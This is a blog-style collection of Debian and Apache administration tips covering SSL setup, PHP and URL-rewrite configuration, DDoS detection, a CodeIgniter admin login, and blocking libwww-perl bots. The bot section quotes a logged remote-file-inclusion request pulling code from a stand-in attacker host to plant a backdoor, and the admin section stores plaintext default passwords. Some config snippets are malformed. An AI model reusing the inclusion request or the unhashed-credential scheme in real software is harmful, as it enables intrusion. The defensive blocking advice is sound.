Installing and Configuring Commercial SSL on Debian Linux

[dfads params=’groups=-1′]

Note: Please note that commercial SSL certificates require a unique IP address for SSL-enabled sites.

a. Enable SSL for Apache and make a directory named “ssl” inside “/etc/apache2/”

[code]
a2enmod ssl
mkdir /etc/apache2/ssl
[/code]

b. Create a Certificate Signing Request

[code]
cd /etc/apache2/ssl
openssl req -new -days 365 -nodes -keyout www.mydomain.com.key -out www.mydomain.com.csr
[/code]

The above command will create a certificate signing request (CSR) for the site which you’d like to use with SSL. Leave the challenge password blank.
Execute the following command to protect the key:

[code]
chmod 400 /etc/apache2/ssl/www.mydomain.com.key
[/code]

Files for your domain will be created in /etc/apache2/ssl. You may now submit the file ending in .csr to a commercial SSL provider for signing. You will receive a signed file after the CA signs the request. Save this file as /etc/apache2/ssl/www.mydomain.com.crt.
Execute the following command to protect the signed certificate:

[code]
chmod 400 /etc/apache2/ssl/www.mydomain.com.crt
[/code]

[dfads params=’groups=-1′]

c. Get the CA Root Certificate
You’ll need to get the root certificate for the CA that you paid to sign your certificate. You may obtain the root certs for various providers from these sites:
Verisign
Thawte
Globalsign
Comodo
For example, if we downloaded a root cert for Verisign, we would save it to /etc/apache2/ssl/verisign.cer.
d. Configure Apache to use the Signed SSL Certificate.
We’ll add an entry to /etc/apache2/ports.conf for the IP address you’ll be using to host your SSL-enabled site.
File excerpt:/etc/apache2/ports.conf

[code]
NameVirtualHost 12.34.56.78:443
Listen 443
[/code]

Replace the above IP address with your dedicated IP Address. Next, we edit the VirtualHost Configuration file i.e. /etc/apache2/sites-available/default in our case.

[code]
<Virtualhost 10.10.10.109:443>
SSLEngine On SSLCertificateFile /etc/apache2/ssl/www.mydomain.com.crt
SSLCertificateKeyFile /etc/apache2/ssl/www.mydomain.com.key
SSLCACertificateFile /etc/apache2/ssl/verisign.cer

ServerAdmin info@mydomain.com
ServerName www.mydomain.com
DocumentRoot /var/www/
ErrorLog /var/log/apache2/error.log
CustomLog /var/log/apache2/access.log combined
</Vritaulhost>
[/code]

NOTE: You can edit your existing Virtualhost Configuration file (Virtualhost *:80) by adding the above attributes within the Virtualhost tag.

e. Restart Apache:

[code]
/etc/init.d/apache2 restart
[/code]

f. Congratulations, you’ve installed a commercial SSL certificate! You can visit your site with SSL enabled. i.e. https://mydomain.com OR https://localhost/your_website/

[Source: https://library.linode.com/web-servers/apache/ssl-guides/debian-5-lenny]

[dfads params=’groups=-1′]

Upload Max Filesize PHP Configuration

[dfads params=’groups=-1′]

I have installed Apache2, PHP5.5 & MySQL5 independently on my Debian 7.3 OS. I hosted my drupal site on my Dedicated Server. I faced problem to upload files greater than 2MB from the CMS of the Site. After exploring the Internet I found the solution. Here’s the steps:

1. Edit /etc/php5/cgi/php.ini file.

2. Add the following line of code:

[php]upload_max_filesize = 10M[/php]

Make sure that you are not editing /etc/php5/php.ini file

[dfads params=’groups=-1′]

Solution to Url Encoded Slashes (%2F) Problem in Apache

[dfads params=’groups=-1′]

I was working on Drupal 6. I had to troubleshoot a site that has a problem in its link. The ugly URL looks like this: http://rcportblair.ignou.ac.in/admin/build/employee/search/result/none/0/none/%252F1

The last argument in the link i.e. %252F is a forward slash automatically added by the Drupal engine which was creating problem while generating result. There are many ways to handle these urls. One way is listed below:

<VirtualHost *:80>
    AllowEncodedSlashes On
</VirtualHost>

This directive may be set in server config file (e.g. httpd.conf OR /etc/apache2/sites-available/default) and may appear inside <VirtualHost> containers to affect certain websites. Using it in .htaccess files is not allowed.

[dfads params=’groups=-1′]

Clean URLs in CodeIgniter and Drupal for Debian based Dedicated Servers

[dfads params=’groups=-1′]

Initially, when my projects were in CodeIgniter I struggled to find out the solutions for Clean URLs. Now, I am working on Drupal CMS and the process for activating Clean URLs are similar as in CodeIgniter.

1. The first step is to add the following code in your .htaccess file.

<IfModule mod_rewrite.c> RewriteEngine on

# Rewrite URLs of the form 'x' to the form 'index.php?q=x'.
RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ project_dir/index.php?q=$1 [L,QSA] </IfModule>

2. Next, for Debian Linux OS edit /etc/apache2/sites-available/default file and add the following script.
<Directory "/var/www/project_dir/"> RewriteEngine on RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ project_dir/index.php?q=$1 [L,QSA] </Directory>

3. If you are using CodeIgniter, the above two steps are done but for Drupal sites, visit the following link from your Drupal CMS Admin: http://your_site/admin/settings/clean-urls. Select the Enabled radio button & click on save.

Congratulations, You have activated Clean URLs for your websites.

[dfads params=’groups=-1′]

Apache is running a threaded MPM, but your PHP Module is not compiled to be threadsafe. You need to recompile PHP.

[dfads params=’groups=-1′]

After installing Apache2, MySQL & PHP on Debian wheezy 7.1, I tried to reboot the apache server. It showed me the following error.
Starting web server: apache2[Fri Dec 27 11:29:16 2013] [crit] Apache is running a threaded MPM, but your PHP Module is not compiled to be threadsafe. You need to recompile PHP. Pre-configuration failed Action 'start' failed. The Apache error log may have more information. failed!

So I searched through the internet to recomplie the PHP Source. But none of the tutorials were best and feasible.

Finally, after long try I found the command below that helped me to run the apache and PHP along.
apt-get install apache2-mpm-prefork

[dfads params=’groups=-1′]

How to detect a DOS / DDOS Attack on your Linux Server?

[dfads params=’groups=-1′]

While researching through website traffic problems, the first thing that came in my mind is DoS / DDoS attacks. So, I started to study about it.

What is DoS / DDoS attack?

(Wiki Answer) : In computing, a denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a machine or network resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of efforts to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet.

How to check if your Linux server is under DDOS Attack?

netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort –n

This command will show you the list of IP’s which have logged in is maximum number of connections to your server. It becomes more complex if the attacker use fewer connections with more number of attacking IP’s.

[dfads params=’groups=-1′]

We can check active connections to the server using the following command:

netstat -n | grep :80 |wc –l

The above command will show the active connections that are open to your server. The result may vary but if it shows connections more than 500, then you will be definitely having problems.

netstat -n | grep :80 | grep SYN |wc –l

If the result of the above command is 100 or above then you are having problems with sync attack.

Once you get an idea of the ip attacking your server, you can easily block it. Fire the following command to block specific IP:

route add ipaddress reject

Fire the following command to check whether that IP is blocked or not:

route -n |grep IPaddress

You can also block a IP with iptables on the server by using the following command.

iptables -A INPUT 1 -s IPADRESS -j DROP/REJECT

service iptables restart

service iptables save

After firing the above command, KILL all httpd connection and than restart httpd service by using following command:

killall -KILL httpd/apache2

[dfads params=’groups=-1′]

[Updated 12-12-2013]

In order to delete the route entry, fire the following command.

ip route delete ipaddress

[Source : https://kb.hivelocity.net/how-to-check-if-your-linux-server-is-under-ddos-attack/]

Admin Panel with Login in CodeIgniter

[dfads params=’groups=-1′]

Today, I came up with a solution for how to make an inbuilt Admin Panel with already coded Login module in codeigniter. Just follow the steps below to setup into your project.

1. Download the adminPanelWithLogin.zip file. Extract it. Copy the respective admin folders to the Controllers, Models, & Views of your project.

2. Create the MySQL table & populate data.

[sql]
CREATE TABLE IF NOT EXISTS `tbl_admin` (
`admin_id` int(4) NOT NULL AUTO_INCREMENT,
`admin_name` varchar(128) NOT NULL,
`admin_email` varchar(64) NOT NULL,
`admin_password` varchar(64) NOT NULL,
`admin_role` int(2) NOT NULL,
`admin_status` int(1) NOT NULL,
PRIMARY KEY (`admin_id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=14 ;

INSERT INTO `tbl_admin` (`admin_id`, `admin_name`, `admin_email`, `admin_password`, `admin_role`, `admin_status`) VALUES
(1, ‘admin’, ‘admin’, ‘admin_123’, 1, 0),
(13, ‘super’, ‘super’, ‘super_123’, 1, 1);
[/sql]

3. Check whether the database & session are initiated by exploring to application/config/autoload.php file.

[php]$autoload[‘libraries’] = array(‘database’, ‘session’); [/php]

4. Browse the admin login from you browser: http://localhost/your_project/admin. A screen must appear like this:

5. Use the default admin user as “admin ” and Password as “admin_123” then press Login. You will be redirected to a secure home page like this:

You can further add modules of your choice & code your project as you like.

Feedbacks & suggestions are always welcome.

[dfads params=’groups=-1′]

The rise of bots, spammers, crack attacks and libwww-perl

[dfads params=’groups=-1′]

libwww-perl (LWP) is fine WWW client/server library for Perl. Unfortunately this library used by many script kiddy, crackers, and spam bots.

Verify bots…

Following is a typical example, you will find in your apache or lighttpd access.log log file:

$ grep ‘libwww-perl’ access.log

$ grep ‘libwww-perl’ /var/log/lighttpd/access.log

Output:

62.152.64.210 www.domain.com - [23/Oct/2006:22:24:37 +0000] "GET /wamp_dir/setup/yesno.phtml?no_url=http://www.someattackersite.com/list.txt? HTTP/1.1" 200 72672 "-" "libwww-perl/5.76"

So someone is trying to attack your host and exploit security by installing a backdoor. yesno.phtml is poorly written application and it can run or include php code (list.txt) from remote server. This code install perl based backdoor in /tmp or /dev/shm and send notification to IRC server or bot master i.e. server is ready for attack against other computer. This back door can flood or DDoS other victims server (it will also cost you tons of bandwidth). Usually attacker will hide himself behind zombie machines. Blocking by user agent can help and in some cases problem can be dropped all together.

You will also notice that libwww-perl/5.76 as browser name (read as useragent). To avoid such attack:
=> Block all libwww-perl useragent
=> Run web server in chrooted jail

How to block libwww-perl under Lighttpd web server?

Open lighttpd.conf file:
# vi /etc/lighttpd/lighttpd.conf
Append following line to main server or virtual hosting section:
$HTTP["useragent"] =~ "libwww-perl" { url.access-deny = ( "" ) }
Save and close the file. Restart the lighttpd:
# /etc/init.d/lighttpd restart

How to block libwww-perl under Apache web server?

Use mod_rewrite and .htaccess file to block user agent libwww-perl. Open your .htaccess file and add rule as follows:
SetEnvIfNoCase User-Agent "^libwww-perl*" block_bad_bots Deny from env=block_bad_bots

How do I verify that User-Agent libwww-perl is blocked?

Download this perl script on your own workstation. Replace http://your-website.com/ with your site name:
$req = HTTP::Request->new(GET => 'http://your-website.com/');
Save and execute perl script:
$ chmod +x test-lwp.pl $ ./test-lwp.pl
Output:

Error: 403 Forbidden

You should see 403 Forbidden error as your user-agent is blocked by server configuration.

Please note that blocking by user agent can help, but spammers spoof user agents. My personal experience shows that blocking libwww-perl saves bandwidth and drops potential threats by 50-80%.

Another highly recommended solution is to run web server in chrooted jail. In chrooted jail attacker cannot install backdoor as shell and utilities such as wget not available to download the perl code. I also recommend blocking all outgoing http/ftp request from your webserver using iptables or use hardware based firewall such as Cisco ASA Firewalls.

Final extreme solution is to put entire root file system on read only media such as CDROM (or use live CD). No attacker can bring down your web server if it is serving pages from read only media (except DoS/DDoS attack).

What do you think? How do you block such attacks? Please share your nifty technique with us.

[source 1=”http://www.cyberciti.biz” language=”:”][/source]
[dfads params=’groups=-1′]